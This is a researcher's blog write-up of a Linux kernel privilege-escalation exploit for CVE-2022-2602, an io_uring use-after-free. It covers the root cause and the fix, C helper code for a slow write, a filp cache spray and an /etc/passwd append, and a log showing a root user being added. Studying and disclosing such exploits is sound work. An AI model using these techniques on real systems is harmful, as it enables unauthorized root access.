CVE-2022-2602: DirtyCred File Exploitation applied on an io_uring UAF

Last updated Dec 20, 2022

# Introduction

In the past few weeks, I worked with @LukeGix (check out his blog post on the same vulnerability here) to exploit CVE-2022-2602, a bug that is interesting from multiple perspectives and had no public exploit: a Use-After-Free in the io_uring subsystem's handling of registered file descriptors. We used a data-only attack against kernel version 5.15.74 (the latest before the patch), taking inspiration from the DirtyCred technique recently presented at Black Hat USA.

# TL;DR

The vulnerability is a Use-After-Free that impacts the registered file descriptor functionality in the io_uring subsystem. It’s possible to register a file in the io_uring context, have the Unix Garbage Collector free it, and then have the requested io_uring operation (for example, a writev) re-use it. Exploiting the bug was a matter of replacing the freed file structure with a read-only file (e.g. /etc/passwd) in order to write into it, and of getting the timing right within a small race window.

# Vulnerability

# Root cause

The vulnerability is a Use-After-Free in the io_uring subsystem while handling registered files. The IORING_REGISTER_FILES functionality lets a consumer (the user-land application) register file descriptors in the io_uring context so that it does not have to keep them open. It works by passing the list of file descriptors to the io_uring_register syscall. However, the Unix Garbage Collector (well explained in this Project Zero blog post), whose entry point is the unix_gc function and whose responsibility is to de-allocate in-flight sockets, can free these registered files while io_uring is still using them, causing a Use-After-Free.

The vulnerability was discovered by Thadeu Lima de Souza Cascardo, who described it as follows:

The vulnerability is a use-after-free that happens when an io_uring request is being processed on a registered file and the Unix GC runs and frees the io_uring fd and all the registered fds. The order at which the Unix GC processes the inflight fds may lead to registered fds be freed before the io_uring is released and has the chance to unregister and wait for such requests to finish.
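
To make the term "in-flight" concrete: a file descriptor is in flight when it has been sent over a Unix socket as SCM_RIGHTS ancillary data and has not been received yet. The following is a minimal user-space sketch of that mechanism only, not part of the exploit; the helper names `send_fd` and `recv_fd` are hypothetical and chosen for illustration.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/* Send `fd` over the Unix socket `sock` as SCM_RIGHTS ancillary data.
 * Until the peer receives the message, the file is "in flight".
 * Returns 0 on success, -1 on failure. */
int send_fd(int sock, int fd)
{
    char dummy = 'x';                       /* at least one byte of payload */
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;               /* forces correct alignment */
    } ctrl;
    struct msghdr msg;

    memset(&ctrl, 0, sizeof(ctrl));
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof(ctrl.buf);

    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));

    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one descriptor sent with send_fd().
 * Returns the new descriptor, or -1 on failure. */
int recv_fd(int sock)
{
    char dummy;
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union {
        char buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr align;
    } ctrl;
    struct msghdr msg;
    int fd = -1;

    memset(&ctrl, 0, sizeof(ctrl));
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof(ctrl.buf);

    if (recvmsg(sock, &msg, 0) != 1)
        return -1;

    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    if (!cmsg || cmsg->cmsg_level != SOL_SOCKET || cmsg->cmsg_type != SCM_RIGHTS)
        return -1;
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
    return fd;
}
```

Between the `send_fd` and `recv_fd` calls the kernel holds its own reference to the file, which is the kind of reference the Unix GC has to reason about.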

Put simply, to trigger the vulnerability we have to register a file descriptor, use it in an io_uring operation (like a writev) with SQPOLL, and block the write using userfaultfd (as demonstrated in the public POC; we will use something else in our exploit), which stalls the kernel thread. Then we close the io_uring context from user-land, trigger the unix_gc function in some way (which frees the registered file) and resume the faulted kernel thread by releasing the userfault. At that point the UAF should be triggered (with KASAN enabled, you can see a bug report).

# Fix

The idea behind the fix commit is pretty simple: the Unix GC leaves io_uring's registered files alone and lets io_uring handle those resources by itself. Simple and effective.

# Exploitation

# Exploitation strategies

The vulnerability can be approached using different techniques. Since the targeted struct file lives in a dedicated cache (filp), a cross-cache attack is a viable approach: the object has a lot of interesting pointers and behaviours. We considered this possibility initially, but we thought it would be a lot more reliable to go with a data-only technique: since the object is freed, spray the cache and replace the file struct with one under our control. The idea was interesting, but we ran into a lot of problems along the way and, even though the exploit turned out to be quite simple, it took a lot of effort.

# DirtyCred: File Exploitation

The DirtyCred attack is a technique presented this year at Black Hat USA 2022. We are not going to re-explain it, since it is already documented in its original paper; what interests us is the “File Exploitation” part.

[Image from the BH slides]

The idea is pretty simple: if you replace a freed R/W file with a read-only file while a kernel thread is writing into it, you can write into that read-only file. But why, and how? Let’s start with the why. File permissions are checked once, before the write syscall starts writing; once it gets to the actual write (file->f_op->write), no more permission checks are performed. So, if you are able to replace the struct file (retrieved from the fd number installed for that specific context) with an arbitrary one (e.g. a read-only file) after the permission check and before the write operation, you can write into arbitrary files, bypassing permission validation. Well, but how? Mainly by suspending the kernel thread right when it starts writing, using userfaultfd, FUSE or by abusing file locking (Slow Write).
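
The "checked once" behaviour has a well-known, harmless user-space counterpart: access rights are evaluated when a file is opened, and later writes through the already opened descriptor are not re-validated against the file mode. The sketch below is only an analogy for that property, not the kernel path discussed here; the function name `write_after_chmod` and the scratch file under /tmp are assumptions made for the example.

```c
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a scratch file read/write, drop it to mode 0444, then write through
 * the descriptor that is already open.
 * Returns the number of bytes written, or -1 on error. */
ssize_t write_after_chmod(void)
{
    char path[] = "/tmp/perm_demo_XXXXXX";
    const char msg[] = "still writable\n";
    ssize_t n = -1;

    int fd = mkstemp(path);            /* created with mode 0600, opened O_RDWR */
    if (fd < 0)
        return -1;

    /* The file is now read-only for everyone, including its owner... */
    if (fchmod(fd, 0444) == 0)
        /* ...but the open descriptor keeps the access mode it was granted. */
        n = write(fd, msg, sizeof(msg) - 1);

    close(fd);
    unlink(path);
    return n;
}
```

The write succeeds because nothing re-checks the file mode after `open`; DirtyCred abuses the same "validate once, use later" gap one level deeper, inside the kernel.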

We chose to go with the file locking method in order to write a universal exploit that does not depend on specific configurations (FUSE could also be a good alternative, since disabling unprivileged userfaultfd has become a standard mitigation).

I would like to share some observations on this slow write technique, so let’s look at it from the kernel perspective.

# File locking (Slow Write)

File locking is a must-have feature for a kernel: if two concurrent processes write into the same file, the kernel must account for that and deal with it without loss of integrity. How does the kernel do that? Using file locks. Locking is a synchronization primitive that serializes access to the same resource in a multi-threaded environment. On an ext4 file system, ext4_buffered_write_iter is the function responsible for acquiring this lock when a vectored write is requested (as in our case with io_uring): it takes it with inode_lock (and later releases it with inode_unlock), where the inode is the in-kernel representation of our target file. If another thread is already writing into that inode, the kernel thread is put to sleep until the other thread releases the lock. When that happens (the other thread calls inode_unlock), the sleeping kernel thread resumes execution, acquires the lock and starts writing into the file. But what if the struct file is replaced while it sleeps? Since the permission checks have already been done, the write will be performed even if the re-allocated file was opened O_RDONLY! If you look closely at ext4_buffered_write_iter, you can see that the pointer to the struct file is retrieved from iocb->ki_filp, and the following calls use that pointer to perform the write operation (generic_perform_write). We used this technique to keep the write stalled inside the kernel and extend the race window without using userfaultfd.

# fatal_signal_pending

An issue we encountered while developing the exploit was the fatal_signal_pending call in generic_perform_write. This check makes sure that the current context has no fatal signal pending; for example, it aborts the write operation if the process is already exiting. It took us quite some time to get past it, since debugging these kinds of operations leads to misleading behaviour. In the end, the solution was simply to keep the process alive until io_uring has finished its operation, by monitoring the size of our target file:

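#include <sys/stat.h>
#include <unistd.h>

int main(){
	struct stat st;
	/* .. */
	stat("/etc/passwd", &st);
	off_t original_passwd_size = st.st_size;
	/* .. */
	/* Stay alive until the io_uring thread has appended to the file */
	while(st.st_size == original_passwd_size){
		sleep(2);
		stat("/etc/passwd", &st);
	}
	/* .. */
}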

# Exploitation Walkthrough

We have dug a little into the File Exploitation technique; now let’s see how we abused it to write our exploit. We have already seen how to trigger the UAF in the “Root cause” section, so let’s see in detail how we developed the exploit.

# Setup

First, set up the io_uring context to work with the Submission Queue Polling mechanism and register a dummy file using the io_uring_register syscall.
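
As a rough illustration of this setup step, here is a minimal sketch using the raw io_uring_setup and io_uring_register syscalls. It is not taken from our exploit: the helper names `ring_setup_sqpoll` and `ring_register_path`, the idle timeout and the choice of a single registered file are assumptions made for the example, and mapping the rings and queuing the writev are left out.

```c
#include <errno.h>
#include <fcntl.h>
#include <linux/io_uring.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Create an io_uring instance with submission queue polling enabled.
 * Returns the ring fd, or -errno on failure. */
int ring_setup_sqpoll(unsigned entries, struct io_uring_params *p)
{
    memset(p, 0, sizeof(*p));
    p->flags = IORING_SETUP_SQPOLL;
    p->sq_thread_idle = 2000;   /* ms of inactivity before the poller sleeps */

    long fd = syscall(__NR_io_uring_setup, entries, p);
    return fd < 0 ? -errno : (int)fd;
}

/* Open (or create) `path` and register it as the only fixed file (index 0).
 * Returns the opened fd, or -errno on failure. */
int ring_register_path(int ring_fd, const char *path)
{
    int fd = open(path, O_RDWR | O_CREAT, 0644);
    if (fd < 0)
        return -errno;

    if (syscall(__NR_io_uring_register, ring_fd,
                IORING_REGISTER_FILES, &fd, 1) < 0) {
        int err = errno;
        close(fd);
        return -err;
    }
    return fd;
}
```

Once a file is registered, submission queue entries refer to it by its index in the registered table (with the IOSQE_FIXED_FILE flag) instead of by descriptor number.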

# Starting slow_write

Since we want to replace the userfaultfd technique used in the published POC with another one, we chose the Slow Write technique. As described before, we can pause a write operation by abusing the file locking mechanism. Before letting io_uring write into the registered “dummy file”, we start a “slow write” on that file (that is, we write a lot of data, which takes time and holds the file's inode lock), so that the kernel thread that performs the write on behalf of io_uring ends up waiting at the inode_lock call. Our slow write was inspired by this CVE-2022-2588 exploit function. Now that the write operation is paused, it is the perfect time to trigger the UAF!
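
The slow write itself boils down to one very large write call on the dummy file, issued from a separate thread. Below is a minimal sketch of such a helper, under the assumption that a single writev over many iovecs pointing at the same buffer is used; the name `slow_write`, its parameters and the `MAX_CHUNKS` constant are hypothetical, and the sizes needed to get a usable window depend on the machine.

```c
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/uio.h>
#include <unistd.h>

/* Linux accepts at most 1024 iovecs per writev() call. */
#define MAX_CHUNKS 1024

/* Issue ONE writev() of chunk_size * nr_chunks bytes to `path`.
 * All iovecs point at the same buffer, so little memory is needed even for
 * a very large write. Returns the bytes written, or -1 on error. */
ssize_t slow_write(const char *path, size_t chunk_size, int nr_chunks)
{
    ssize_t written = -1;
    char *chunk = NULL;
    struct iovec *iov = NULL;
    int fd;

    if (chunk_size == 0 || nr_chunks <= 0 || nr_chunks > MAX_CHUNKS)
        return -1;

    chunk = malloc(chunk_size);
    iov = calloc((size_t)nr_chunks, sizeof(*iov));
    if (!chunk || !iov)
        goto out;

    memset(chunk, 'A', chunk_size);
    for (int i = 0; i < nr_chunks; i++) {
        iov[i].iov_base = chunk;
        iov[i].iov_len = chunk_size;
    }

    fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        goto out;

    /* A single syscall: the write path keeps the inode locked until it returns. */
    written = writev(fd, iov, nr_chunks);
    close(fd);
out:
    free(iov);
    free(chunk);
    return written;
}
```

Run from its own thread with a large enough total size, the call keeps the inode busy while the main thread goes on with the next steps.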

# Free the registered file (trigger the UAF)

In order to trigger the UAF, we have to trigger the Unix Garbage Collector (the unix_gc function) in some way. That was not a big deal: first, because the POC already had a source line that did exactly that; second, because every unix_* socket operations table calls it from its release function (for example, with unix_stream_ops): unix_release -> unix_release_sock -> unix_gc.

close(socket(AF_UNIX, SOCK_DGRAM, 0));

With this simple one-liner, unix_gc is triggered and our target file chunk should be freed!

# Replace the target chunk

Now we have a freed chunk that can be re-used by another file allocation (since we are in a dedicated cache). Our objective is to re-allocate it with something under our control: a sensitive file that we can open (the open syscall allocates a struct file in the filp cache) and that lets us perform a privileged operation by writing into it. Obviously, we went for “/etc/passwd” :}

As we described in the “DirtyCred: File Exploitation” section, since file permissions are checked only once, we can simply re-allocate the chunk as a read-only file and resume the kernel thread we paused in the “Starting slow_write” section: the write operation will be performed on that read-only file!

# Make the re-allocation more reliable

Since the filp cache can be pretty busy (a lot of file operations and socket-related objects live in this cache), a massive spray can be performed after unix_gc is triggered, but that may not be enough. A good approach could also be to create some “holes” before triggering the re-allocation of the targeted chunk (to grow the freelist, but without releasing entire slabs), so that the following “massive spray” of “/etc/passwd” files is more reliable.
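
In user-space terms, both the "holes" and the "spray" are just batches of open and close calls, since every open allocates one struct file. The sketch below shows the two building blocks under that assumption; the helper names `spray_open` and `punch_holes`, the idea of closing every n-th descriptor and the batch sizes are illustrative choices, not the exact logic of our exploit.

```c
#include <fcntl.h>
#include <unistd.h>

/* Open `path` read-only up to `n` times, storing the descriptors in `fds`.
 * Each successful open allocates one struct file.
 * Returns how many descriptors were opened. */
int spray_open(const char *path, int *fds, int n)
{
    int opened = 0;

    for (int i = 0; i < n; i++) {
        fds[i] = open(path, O_RDONLY);
        if (fds[i] < 0)
            break;                  /* e.g. RLIMIT_NOFILE reached */
        opened++;
    }
    return opened;
}

/* Close every `step`-th descriptor of a previous batch, so that the freed
 * objects are scattered across slabs instead of emptying whole slabs.
 * Returns how many descriptors were closed. */
int punch_holes(int *fds, int n, int step)
{
    int closed = 0;

    if (step <= 0)
        return 0;
    for (int i = 0; i < n; i += step) {
        if (fds[i] >= 0) {
            close(fds[i]);
            fds[i] = -1;            /* mark the slot as released */
            closed++;
        }
    }
    return closed;
}
```

A possible ordering is a first batch on a throwaway file followed by `punch_holes`, then, once unix_gc has run, a second `spray_open` on the target file. Keep in mind that the kernel may release a closed file's structure with some delay, so timing still matters.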

# Release the slow_write lock

Now that we have replaced the victim chunk with a specific file, when the slow write operation finishes, its lock is released; the io_uring kernel thread acquires the lock and starts writing into our re-allocated file (“/etc/passwd”), even though it was opened read-only.

# Overwrite /etc/passwd

First, in order to append text to “/etc/passwd” rather than overwrite it from the start, our victim file (the one used as the victim chunk in our Use-After-Free) was opened with the O_APPEND flag, which makes writes land at the end of the file. What can we write into it? A simple user entry in the following format, which carries the password hash inline and so needs no entry in “/etc/shadow”:

<USER>:<HASH>:0:0:/root:/root:/bin/sh
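
For illustration, this is roughly how such a line can be built, together with a tiny demonstration of the O_APPEND semantics on an ordinary scratch file. The helpers `format_passwd_entry` and `append_line` are hypothetical names for this sketch; the hash is assumed to be computed elsewhere and is passed in as a plain string.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Build "<user>:<hash>:0:0:/root:/root:/bin/sh\n" into `out`.
 * Returns the line length, or -1 if it does not fit in `cap` bytes. */
int format_passwd_entry(char *out, size_t cap, const char *user, const char *hash)
{
    int n = snprintf(out, cap, "%s:%s:0:0:/root:/root:/bin/sh\n", user, hash);

    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* Append `line` to an existing file through an O_APPEND descriptor.
 * With O_APPEND every write lands at the current end of the file.
 * Returns the file size after the write, or -1 on error. */
long append_line(const char *path, const char *line)
{
    size_t len = strlen(line);
    int fd = open(path, O_WRONLY | O_APPEND);

    if (fd < 0)
        return -1;

    ssize_t n = write(fd, line, len);
    off_t end = lseek(fd, 0, SEEK_END);
    close(fd);
    return (n == (ssize_t)len && end >= 0) ? (long)end : -1;
}
```

In the exploit there is no such direct `append_line` call on “/etc/passwd”, of course: the append flag comes from the victim file, and the write is carried out by the io_uring kernel thread.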

# POC || GTFO

You can find the full exploit here: https://github.com/kiks7/CVE-2022-2602-Kernel-Exploit.

/ $ uname -a
Linux (none) 5.15.74 #20 SMP Sat Nov 19 14:01:51 CET 2022 x86_64 GNU/Linux
/ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
user:x:1000:1000:kiks,,,:/home/user:/bin/sh
/ $ id
uid=1000(user) gid=1000 groups=1000
/ $ /poc
[P] P1
[P] P2
[*] Creating thread for slow write on /tmp/rwA
[*] Sleeping while waiting that slow_write starts ..
[*][T1] Starting slow write ..
[*][T1] Slowing write...
[P] P3/P4
[P] P5
[*] Triggering unix_gc and freeing the registered fd
[*] unix_gc finished !
[P] P6
[*] Spraying target files ..
[*] Wait that slow_write finishes ..
[P] P7/P8/P9
[+][T1] slow_write finished
[+] Slow write finished .. closing io_uring fd
[*] Waits that the io_uring thread continues the writev operation while the process is still alive
[+] Everything done !
Password:
uid=0(root) gid=0 groups=0
[+] DONE
/ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
user:x:1000:1000:kiks,,,:/home/user:/bin/sh
pwn:$6$pwn$5m1zBfEzD3xCg.wOtCtlKePwQL3Y5UiVAQBEAIv67Ir9JfZjmjO7XwzMzk0IcRoPjtWg.k2ytbimpKp1s/RB2/:0:0:/root:/root:/bin/sh
/ $

# Extra: new KRWX feature

KRWX is a tool I developed to dig deeper into kernel internals and to assist kernel exploitation. Since in this case it was necessary to deal with a specific dedicated cache (filp) and this feature wasn’t implemented, I added it. It’s now possible to retrieve the address of a specific kmem_cache using kmem_cache_get(char* name), as follows:

#include "lib/krwx.h"
int main(){
	/* .. */
	kmem_cache_get("filp");
	/* .. */
}

It returns the kernel address of the cache, which can then be used to allocate objects in it with the already present user-land kmem_cache_alloc() (with some internal changes to accommodate the implementation). You can find the full example here, but this is an extract:

#include "lib/krwx.h"
int main(){
	/* .. */
	filp = kmem_cache_get("filp");
	chunk = kmem_cache_alloc(filp, GFP_KERNEL);
	kmem_cache_free(filp, chunk);
	/* .. */
}

If you are interested, you can find the project on github.

# Conclusions

This is how we managed to exploit CVE-2022-2602 using the inode locking technique. It was a really fun (and sometimes painful) adventure, and it was a pleasure to work on it with Luca (@LukeGix). You can take a look at his blog post to see how it’s possible to exploit the same vulnerability with the userfaultfd and FUSE techniques!

Stay tuned for more!

👾 @kiks